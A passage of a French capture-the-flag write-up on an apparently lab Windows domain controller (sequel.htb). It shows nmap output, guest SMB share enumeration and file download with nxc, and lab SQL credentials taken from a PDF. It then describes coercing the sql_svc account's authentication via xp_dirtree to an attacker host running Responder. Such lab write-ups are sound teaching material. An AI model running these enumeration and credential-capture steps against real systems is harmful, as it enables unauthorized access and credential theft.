class="lnt"> 12 </span><span class="lnt"> 13 </span><span class="lnt"> 14 </span><span class="lnt"> 15 </span><span class="lnt"> 16 </span><span class="lnt"> 17 </span><span class="lnt"> 18 </span><span class="lnt"> 19 </span><span class="lnt"> 20 </span><span class="lnt"> 21 </span><span class="lnt"> 22 </span><span class="lnt"> 23 </span><span class="lnt"> 24 </span><span class="lnt"> 25 </span><span class="lnt"> 26 </span><span class="lnt"> 27 </span><span class="lnt"> 28 </span><span class="lnt"> 29 </span><span class="lnt"> 30 </span><span class="lnt"> 31 </span><span class="lnt"> 32 </span><span class="lnt"> 33 </span><span class="lnt"> 34 </span><span class="lnt"> 35 </span><span class="lnt"> 36 </span><span class="lnt"> 37 </span><span class="lnt"> 38 </span><span class="lnt"> 39 </span><span class="lnt"> 40 </span><span class="lnt"> 41 </span><span class="lnt"> 42 </span><span class="lnt"> 43 </span><span class="lnt"> 44 </span><span class="lnt"> 45 </span><span class="lnt"> 46 </span><span class="lnt"> 47 </span><span class="lnt"> 48 </span><span class="lnt"> 49 </span><span class="lnt"> 50 </span><span class="lnt"> 51 </span><span class="lnt"> 52 </span><span class="lnt"> 53 </span><span class="lnt"> 54 </span><span class="lnt"> 55 </span><span class="lnt"> 56 </span><span class="lnt"> 57 </span><span class="lnt"> 58 </span><span class="lnt"> 59 </span><span class="lnt"> 60 </span><span class="lnt"> 61 </span><span class="lnt"> 62 </span><span class="lnt"> 63 </span><span class="lnt"> 64 </span><span class="lnt"> 65 </span><span class="lnt"> 66 </span><span class="lnt"> 67 </span><span class="lnt"> 68 </span><span class="lnt"> 69 </span><span class="lnt"> 70 </span><span class="lnt"> 71 </span><span class="lnt"> 72 </span><span class="lnt"> 73 </span><span class="lnt"> 74 </span><span class="lnt"> 75 </span><span class="lnt"> 76 </span><span class="lnt"> 77 </span><span class="lnt"> 78 </span><span class="lnt"> 79 </span><span class="lnt"> 80 </span><span class="lnt"> 81 </span><span class="lnt"> 82 </span><span class="lnt"> 83 </span><span class="lnt"> 84 </span><span class="lnt"> 85 </span><span class="lnt"> 86 </span><span class="lnt"> 87 </span><span class="lnt"> 88 </span><span class="lnt"> 89 </span><span class="lnt"> 90 </span><span class="lnt"> 91 </span><span class="lnt"> 92 </span><span class="lnt"> 93 </span><span class="lnt"> 94 </span><span class="lnt"> 95 </span><span class="lnt"> 96 </span><span class="lnt"> 97 </span><span class="lnt"> 98 </span><span class="lnt"> 99 </span><span class="lnt">100 </span><span class="lnt">101 </span><span class="lnt">102 </span><span class="lnt">103 </span><span class="lnt">104 </span><span class="lnt">105 </span><span class="lnt">106 </span><span class="lnt">107 </span><span class="lnt">108 </span><span class="lnt">109 </span><span class="lnt">110 </span><span class="lnt">111 </span><span class="lnt">112 </span><span class="lnt">113 </span><span class="lnt">114 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nmap -sC -sV -An -T4 -vvv -p- 10.10.11.202 </span></span><span class="line"><span class="cl">PORT STATE SERVICE REASON VERSION </span></span><span class="line"><span class="cl">53/tcp open domain syn-ack ttl <span class="m">127</span> Simple DNS Plus </span></span><span class="line"><span class="cl">88/tcp open kerberos-sec syn-ack ttl <span class="m">127</span> Microsoft Windows Kerberos <span class="o">(</span>server time: 2025-09-10 22:21:01Z<span class="o">)</span> </span></span><span class="line"><span class="cl">135/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">139/tcp open netbios-ssn syn-ack ttl <span class="m">127</span> Microsoft Windows netbios-ssn </span></span><span class="line"><span class="cl">389/tcp open ldap syn-ack ttl <span class="m">127</span> Microsoft Windows Active Directory LDAP <span class="o">(</span>Domain: sequel.htb0., Site: Default-First-Site-Name<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssl-cert: Subject: </span></span><span class="line"><span class="cl"><span class="p">|</span> Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel </span></span><span class="line"><span class="cl"><span class="p">|</span> Issuer: <span class="nv">commonName</span><span class="o">=</span>sequel-DC-CA/domainComponent<span class="o">=</span>sequel </span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key type: rsa </span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key bits: <span class="m">2048</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> Signature Algorithm: sha256WithRSAEncryption </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid before: 2024-01-18T23:03:57 </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid after: 2074-01-05T23:03:57 </span></span><span class="line"><span class="cl"><span class="p">|</span> MD5: ee4cc647ebb2c23ef4721d7028809d82 </span></span><span class="line"><span class="cl"><span class="p">|</span> SHA-1: d88d12ae8a50fcf12242909e3dd75cff92d1a480 </span></span><span class="line"><span class="cl"><span class="p">|</span> -----BEGIN CERTIFICATE----- </span></span><span class="line"><span class="cl"><span class="p">|</span> MIIFkTCCBHmgAwIBAgITHgAAAAsyZYRdLEkTIgAAAAAACzANBgkqhkiG9w0BAQsF </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="nv">I1fLChrYFtPk3g5JHaHyIE9aY3EUmU3EH2SKhRSi5R6GJBctmw</span><span class="o">==</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_-----END CERTIFICATE----- </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssl-date: 2025-09-10T22:22:35+00:00<span class="p">;</span> +8h00m00s from scanner time. </span></span><span class="line"><span class="cl">445/tcp open microsoft-ds? syn-ack ttl <span class="m">127</span> </span></span><span class="line"><span class="cl">464/tcp open kpasswd5? syn-ack ttl <span class="m">127</span> </span></span><span class="line"><span class="cl">593/tcp open ncacn_http syn-ack ttl <span class="m">127</span> Microsoft Windows RPC over HTTP 1.0 </span></span><span class="line"><span class="cl">636/tcp open ssl/ldap syn-ack ttl <span class="m">127</span> Microsoft Windows Active Directory LDAP <span class="o">(</span>Domain: sequel.htb0., Site: Default-First-Site-Name<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssl-cert: Subject: </span></span><span class="line"><span class="cl"><span class="p">|</span> Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel </span></span><span class="line"><span class="cl"><span class="p">|</span> Issuer: <span class="nv">commonName</span><span class="o">=</span>sequel-DC-CA/domainComponent<span class="o">=</span>sequel </span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key type: rsa </span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key bits: <span class="m">2048</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> Signature Algorithm: sha256WithRSAEncryption </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid before: 2024-01-18T23:03:57 </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid after: 2074-01-05T23:03:57 </span></span><span class="line"><span class="cl"><span class="p">|</span> MD5: ee4cc647ebb2c23ef4721d7028809d82 </span></span><span class="line"><span class="cl"><span class="p">|</span> SHA-1: d88d12ae8a50fcf12242909e3dd75cff92d1a480 </span></span><span class="line"><span class="cl"><span class="p">|</span> -----BEGIN CERTIFICATE----- </span></span><span class="line"><span class="cl"><span class="p">|</span> MIIFkTCCBHmgAwIBAgITHgAAAAsyZYRdLEkTIgAAAAAACzANBgkqhkiG9w0BAQsF </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="nv">I1fLChrYFtPk3g5JHaHyIE9aY3EUmU3EH2SKhRSi5R6GJBctmw</span><span class="o">==</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_-----END CERTIFICATE----- </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssl-date: 2025-09-10T22:22:34+00:00<span class="p">;</span> +7h59m59s from scanner time. </span></span><span class="line"><span class="cl">1433/tcp open ms-sql-s syn-ack ttl <span class="m">127</span> Microsoft SQL Server <span class="m">2019</span> 15.00.2000.00<span class="p">;</span> RTM </span></span><span class="line"><span class="cl"><span class="p">|</span>_ms-sql-info: ERROR: Script execution failed <span class="o">(</span>use -d to debug<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssl-cert: Subject: <span class="nv">commonName</span><span class="o">=</span>SSL_Self_Signed_Fallback </span></span><span class="line"><span class="cl"><span class="p">|</span> Issuer: <span class="nv">commonName</span><span class="o">=</span>SSL_Self_Signed_Fallback </span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key type: rsa </span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key bits: <span class="m">2048</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> Signature Algorithm: sha256WithRSAEncryption </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid before: 2025-09-10T22:17:26 </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid after: 2055-09-10T22:17:26 </span></span><span class="line"><span class="cl"><span class="p">|</span> MD5: 8f5d163bc1ef9dbb2b789cdf2d7b5a90 </span></span><span class="line"><span class="cl"><span class="p">|</span> SHA-1: 6c89bf0840566f823a006405fce65a4f0570de19 </span></span><span class="line"><span class="cl"><span class="p">|</span> -----BEGIN CERTIFICATE----- </span></span><span class="line"><span class="cl"><span class="p">|</span> MIIDADCCAeigAwIBAgIQfAGJqsgHZopA2ARCvdHiZTANBgkqhkiG9w0BAQsFADA7 </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="nv">JfvGOQ</span><span class="o">==</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_-----END CERTIFICATE----- </span></span><span class="line"><span class="cl"><span class="p">|</span>_ms-sql-ntlm-info: ERROR: Script execution failed <span class="o">(</span>use -d to debug<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssl-date: 2025-09-10T22:22:35+00:00<span class="p">;</span> +8h00m00s from scanner time. </span></span><span class="line"><span class="cl">3268/tcp open ldap syn-ack ttl <span class="m">127</span> Microsoft Windows Active Directory LDAP <span class="o">(</span>Domain: sequel.htb0., Site: Default-First-Site-Name<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssl-date: 2025-09-10T22:22:35+00:00<span class="p">;</span> +8h00m00s from scanner time. </span></span><span class="line"><span class="cl"><span class="p">|</span> ssl-cert: Subject: </span></span><span class="line"><span class="cl"><span class="p">|</span> Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel </span></span><span class="line"><span class="cl"><span class="p">|</span> Issuer: <span class="nv">commonName</span><span class="o">=</span>sequel-DC-CA/domainComponent<span class="o">=</span>sequel </span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key type: rsa </span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key bits: <span class="m">2048</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> Signature Algorithm: sha256WithRSAEncryption </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid before: 2024-01-18T23:03:57 </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid after: 2074-01-05T23:03:57 </span></span><span class="line"><span class="cl"><span class="p">|</span> MD5: ee4cc647ebb2c23ef4721d7028809d82 </span></span><span class="line"><span class="cl"><span class="p">|</span> SHA-1: d88d12ae8a50fcf12242909e3dd75cff92d1a480 </span></span><span class="line"><span class="cl"><span class="p">|</span> -----BEGIN CERTIFICATE----- </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="nv">I1fLChrYFtPk3g5JHaHyIE9aY3EUmU3EH2SKhRSi5R6GJBctmw</span><span class="o">==</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_-----END CERTIFICATE----- </span></span><span class="line"><span class="cl">3269/tcp open ssl/ldap syn-ack ttl <span class="m">127</span> Microsoft Windows Active Directory LDAP <span class="o">(</span>Domain: sequel.htb0., Site: Default-First-Site-Name<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssl-cert: Subject: </span></span><span class="line"><span class="cl"><span class="p">|</span> Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel </span></span><span class="line"><span class="cl"><span class="p">|</span> Issuer: <span class="nv">commonName</span><span class="o">=</span>sequel-DC-CA/domainComponent<span class="o">=</span>sequel </span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key type: rsa </span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key bits: <span class="m">2048</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> Signature Algorithm: sha256WithRSAEncryption </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid before: 2024-01-18T23:03:57 </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid after: 2074-01-05T23:03:57 </span></span><span class="line"><span class="cl"><span class="p">|</span> MD5: ee4cc647ebb2c23ef4721d7028809d82 </span></span><span class="line"><span class="cl"><span class="p">|</span> SHA-1: d88d12ae8a50fcf12242909e3dd75cff92d1a480 </span></span><span class="line"><span class="cl"><span class="p">|</span> -----BEGIN CERTIFICATE----- </span></span><span class="line"><span class="cl"><span class="p">|</span> MIIFkTCCBHmgAwIBAgITHgAAAAsyZYRdLEkTIgAAAAAACzANBgkqhkiG9w0BAQsF </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="nv">I1fLChrYFtPk3g5JHaHyIE9aY3EUmU3EH2SKhRSi5R6GJBctmw</span><span class="o">==</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_-----END CERTIFICATE----- </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssl-date: 2025-09-10T22:22:34+00:00<span class="p">;</span> +7h59m59s from scanner time. </span></span><span class="line"><span class="cl">5985/tcp open http syn-ack ttl <span class="m">127</span> Microsoft HTTPAPI httpd 2.0 <span class="o">(</span>SSDP/UPnP<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Not Found </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Microsoft-HTTPAPI/2.0 </span></span><span class="line"><span class="cl">9389/tcp open mc-nmf syn-ack ttl <span class="m">127</span> .NET Message Framing </span></span><span class="line"><span class="cl">49667/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">49687/tcp open ncacn_http syn-ack ttl <span class="m">127</span> Microsoft Windows RPC over HTTP 1.0 </span></span><span class="line"><span class="cl">49688/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">49706/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">49709/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Host script results: </span></span><span class="line"><span class="cl"><span class="p">|</span>_clock-skew: mean: 7h59m59s, deviation: 0s, median: 7h59m58s </span></span><span class="line"><span class="cl"><span class="p">|</span> smb2-time: </span></span><span class="line"><span class="cl"><span class="p">|</span> date: 2025-09-10T22:21:54 </span></span><span class="line"><span class="cl"><span class="p">|</span>_ start_date: N/A </span></span><span class="line"><span class="cl"><span class="p">|</span> p2p-conficker: </span></span><span class="line"><span class="cl"><span class="p">|</span> Checking <span class="k">for</span> Conficker.C or higher... </span></span><span class="line"><span class="cl"><span class="p">|</span> Check <span class="m">1</span> <span class="o">(</span>port 63970/tcp<span class="o">)</span>: CLEAN <span class="o">(</span>Timeout<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> Check <span class="m">2</span> <span class="o">(</span>port 24393/tcp<span class="o">)</span>: CLEAN <span class="o">(</span>Timeout<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> Check <span class="m">3</span> <span class="o">(</span>port 50586/udp<span class="o">)</span>: CLEAN <span class="o">(</span>Timeout<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> Check <span class="m">4</span> <span class="o">(</span>port 24268/udp<span class="o">)</span>: CLEAN <span class="o">(</span>Timeout<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ 0/4 checks are positive: Host is CLEAN or ports are blocked </span></span><span class="line"><span class="cl"><span class="p">|</span> smb2-security-mode: </span></span><span class="line"><span class="cl"><span class="p">|</span> 311: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Message signing enabled and required </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="smb-share-enumeration---guest">SMB Share ENumeration - guest </h3><p>A l&rsquo;aide de l&rsquo;utilisateur <strong>guest</strong> et sans mot de passe, on réussi à lister les SMB SHARES. Le share <strong>Public</strong> est accessible en lecture.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nxc smb 10.10.11.202 -u <span class="s1">&#39;guest&#39;</span> -p <span class="s1">&#39;&#39;</span> --shares </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> Windows <span class="m">10</span> / Server <span class="m">2019</span> Build <span class="m">17763</span> x64 <span class="o">(</span>name:DC<span class="o">)</span> <span class="o">(</span>domain:sequel.htb<span class="o">)</span> <span class="o">(</span>signing:True<span class="o">)</span> <span class="o">(</span>SMBv1:False<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>+<span class="o">]</span> sequel.htb<span class="se">\g</span>uest: </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> Enumerated shares </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC Share Permissions Remark </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC ----- ----------- ------ </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC ADMIN$ Remote Admin </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC C$ Default share </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC IPC$ READ Remote IPC </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC NETLOGON Logon server share </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC Public READ </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC SYSVOL Logon server share </span></span></code></pre></td></tr></table> </div> </div><h3 id="public-share---sql-server-procedurespdf">Public Share - &ldquo;SQL Server Procedures.pdf&rdquo; </h3><p>On trouve un fichier &ldquo;SQL Server Procedures.pdf&rdquo; dans le share <strong>Public</strong> à l&rsquo;aide de l&rsquo;utilisateur <strong>guest</strong>. J&rsquo;utilise ici uniquement <strong>nxc</strong> pour extraire le fichier.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nxc smb 10.10.11.202 -u <span class="s1">&#39;guest&#39;</span> -p <span class="s1">&#39;&#39;</span> -M spider_plus </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> Windows <span class="m">10</span> / Server <span class="m">2019</span> Build <span class="m">17763</span> x64 <span class="o">(</span>name:DC<span class="o">)</span> <span class="o">(</span>domain:sequel.htb<span class="o">)</span> <span class="o">(</span>signing:True<span class="o">)</span> <span class="o">(</span>SMBv1:False<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>+<span class="o">]</span> sequel.htb<span class="se">\g</span>uest: </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> Started module spidering_plus with the following options: </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> DOWNLOAD_FLAG: False </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> STATS_FLAG: True </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> EXCLUDE_FILTER: <span class="o">[</span><span class="s1">&#39;print$&#39;</span>, <span class="s1">&#39;ipc$&#39;</span><span class="o">]</span> </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> EXCLUDE_EXTS: <span class="o">[</span><span class="s1">&#39;ico&#39;</span>, <span class="s1">&#39;lnk&#39;</span><span class="o">]</span> </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> MAX_FILE_SIZE: <span class="m">50</span> KB </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> OUTPUT_FOLDER: /root/.nxc/modules/nxc_spider_plus </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> Enumerated shares </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC Share Permissions Remark </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC ----- ----------- ------ </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC ADMIN$ Remote Admin </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC C$ Default share </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC IPC$ READ Remote IPC </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC NETLOGON Logon server share </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC Public READ </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC SYSVOL Logon server share </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>+<span class="o">]</span> Saved share-file metadata to <span class="s2">&#34;/root/.nxc/modules/nxc_spider_plus/10.10.11.202.json&#34;</span>. </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> SMB Shares: <span class="m">6</span> <span class="o">(</span>ADMIN$, C$, IPC$, NETLOGON, Public, SYSVOL<span class="o">)</span> </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> SMB Readable Shares: <span class="m">2</span> <span class="o">(</span>IPC$, Public<span class="o">)</span> </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> SMB Filtered Shares: <span class="m">1</span> </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> Total folders found: <span class="m">0</span> </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> Total files found: <span class="m">1</span> </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> File size average: 48.39 KB </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> File size min: 48.39 KB </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> File size max: 48.39 KB </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ cat /root/.nxc/modules/nxc_spider_plus/10.10.11.202.json </span></span><span class="line"><span class="cl"><span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;Public&#34;</span>: <span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;SQL Server Procedures.pdf&#34;</span>: <span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;atime_epoch&#34;</span>: <span class="s2">&#34;2022-11-19 12:50:54&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;ctime_epoch&#34;</span>: <span class="s2">&#34;2022-11-17 20:47:32&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;mtime_epoch&#34;</span>: <span class="s2">&#34;2022-11-19 12:51:25&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;size&#34;</span>: <span class="s2">&#34;48.39 KB&#34;</span> </span></span><span class="line"><span class="cl"> <span class="o">}</span> </span></span><span class="line"><span class="cl"> <span class="o">}</span> </span></span><span class="line"><span class="cl"><span class="o">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ nxc smb 10.10.11.202 -u <span class="s1">&#39;guest&#39;</span> -p <span class="s1">&#39;&#39;</span> --get-file <span class="s2">&#34;\\SQL Server Procedures.pdf&#34;</span> <span class="s2">&#34;SQL Server Procedures.pdf&#34;</span> --share Public </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> Windows <span class="m">10</span> / Server <span class="m">2019</span> Build <span class="m">17763</span> x64 <span class="o">(</span>name:DC<span class="o">)</span> <span class="o">(</span>domain:sequel.htb<span class="o">)</span> <span class="o">(</span>signing:True<span class="o">)</span> <span class="o">(</span>SMBv1:False<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>+<span class="o">]</span> sequel.htb<span class="se">\g</span>uest: </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> Copying <span class="s2">&#34;\SQL Server Procedures.pdf&#34;</span> to <span class="s2">&#34;SQL Server Procedures.pdf&#34;</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.202 <span class="m">445</span> DC <span class="o">[</span>+<span class="o">]</span> File <span class="s2">&#34;\SQL Server Procedures.pdf&#34;</span> was downloaded to <span class="s2">&#34;SQL Server Procedures.pdf&#34;</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="credentials-for-mssql">Credentials for MSSQL </h3><p>Le document &ldquo;<strong>SQL Server Procedures.pdf</strong>&rdquo; est une procedure pour se connecter à une instance de <strong>SQL Server</strong>.</p> <p>Ce document fait mention de plusieurs utilisateurs : Ryan, Tom, brandon.brown.<br> On récupère même des credentials pour se connecter au serveur SQL :</p> <ul> <li>PublicUser : <code>GuestUserCantWrite1</code></li> </ul> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">Bonus </span></span><span class="line"><span class="cl">For new hired and those that are still waiting their users to be created and perms assigned, can sneak a peek at the Database with </span></span><span class="line"><span class="cl">user PublicUser and password GuestUserCantWrite1 . </span></span><span class="line"><span class="cl">Refer to the previous guidelines and make sure to switch the <span class="s2">&#34;Windows Authentication&#34;</span> to <span class="s2">&#34;SQL Server Authentication&#34;</span>. </span></span></code></pre></td></tr></table> </div> </div><h3 id="mssql--xp_dirtree-and-responder">MSSQL : xp_dirtree and responder </h3><p>En utilisant <strong>mssqlclient</strong>, on se connecte au sql server avec l&rsquo;utilisateur récupéré.</p> <p>On peut alors effectuer une requête avec la commande <code>xp_dirtree</code> afin d&rsquo;effectuer une fausse requête pour énumerer un share sur notre ordinateur (IP de l&rsquo;attaquant).<br> Dans le même temps on lance un <strong>responder</strong> qui se met en attente. L&rsquo;idée est la commande est executé de manière authentifier avec l&rsquo;utilisateur <strong>sql_svc</strong>, et le responder peut intercepter ses credentials.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td 